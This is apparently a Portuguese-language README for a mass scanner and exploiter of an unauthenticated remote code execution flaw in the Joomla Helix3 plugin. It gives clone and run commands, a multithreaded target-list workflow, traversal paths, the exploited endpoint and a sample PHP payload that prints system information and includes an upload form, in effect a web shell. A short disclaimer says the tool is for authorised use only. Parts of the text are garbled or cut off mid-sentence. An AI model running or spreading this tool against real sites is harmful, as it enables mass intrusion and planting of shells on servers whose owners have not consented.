
Scanner de vulnerabilidades em massa para CVE-2026-49049 – Execução Remota de Código Não Autenticada no plugin Joomla Helix3. Multithread, detecta payloads PHP executados e brutos.
Scanner em massa de vulnerabilidades para CVE-2026-49049 - Execução Remota de Código sem Autenticação no Framework Helix3 do Joomla.
Esta ferramenta verifica vários sites Joomla para a vulnerabilidade CVE-2026-49049 encontrada no plugin Helix3. A vulnerabilidade permite que um atacante não autenticado envie e execute código PHP arbitrário no servidor alvo.
O scanner tenta:
com_ajax com o plugin helix3.requestspip install requests
🛠 Instalação
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Uso
python2 cve-2026-49049.py targets.txt
Formato de Entrada
Cada linha em targets.txt deve conter um domínio ou IP:
example.com
https://example.com
http://192.168.1.100
Arquivos de Saída
Arquivo Descrição results.txt URLs vulneráveis onde o payload foi executado rez.txt URLs onde o payload foi enviado, mas não executado (PHP bruto)
Exemplo de Saída
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Configuração
Você pode ajustar as seguintes variáveis dentro do script:
Variável Padrão Descrição THREADS 20 Número de threads concorrentes PATHS ['../../../', '../../../../'] Caminhos de travessia de diretório TIMEOUT 5 Tempo limite de requisição HTTP RESULT_FILE 'results.txt' Arquivo de saída para sites vulneráveis RAW_RESULT_FILE 'rez.txt' Arquivo de saída para sites com PHP bruto
🧠 Como Funciona
O script envia uma requisição POST para:
/index.php?option=com_ajax&plugin=helix3&format=json
com um payload que:
Em seguida, verifica se o arquivo está acessível e se o código PHP é executado ou apenas exibido como texto puro.
Exemplo de Payload
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Aviso de Isenção
Esta ferramenta é apenas para fins educacionais e de testes autorizados.
O uso não autorizado desta ferramenta contra sistemas que você não possui ou sem permissão explícita para testar é ilegal. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Mais Avisos: Você pode ver o aviso na capa de Jenderal92. Você pode verificá-lo AQUI !!!